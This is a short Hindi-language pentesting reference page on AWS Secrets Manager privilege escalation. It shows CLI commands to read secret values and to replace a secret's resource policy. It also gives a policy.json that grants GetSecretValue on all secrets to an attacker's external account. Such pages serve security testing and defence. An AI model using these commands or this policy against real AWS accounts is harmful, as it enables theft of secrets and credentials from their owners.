AWS - Secrets Manager Privesc

Secrets Manager

अधिक जानकारी के लिए सीक्रेट्स मैनेजर देखें:

secretsmanager:GetSecretValue

इस अनुमति के साथ एक हमलावर AWS सीक्रेट्समैनेजर में एक सीक्रेट के भीतर सहेजी गई मान को प्राप्त कर सकता है।

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

संभावित प्रभाव: AWS सीक्रेट्स मैनेजर सेवा के अंदर उच्च संवेदनशील डेटा तक पहुंच।

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

पिछली अनुमतियों के साथ अन्य प्रिंसिपल/खातों (यहाँ तक कि बाहरी) को सीक्रेट तक पहुंच देना संभव है। ध्यान दें कि एक KMS कुंजी से एन्क्रिप्ट किए गए सीक्रेट्स पढ़ने के लिए, उपयोगकर्ता को KMS कुंजी पर भी पहुंच होनी चाहिए (अधिक जानकारी के लिए KMS Enum पेज में देखें)।

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}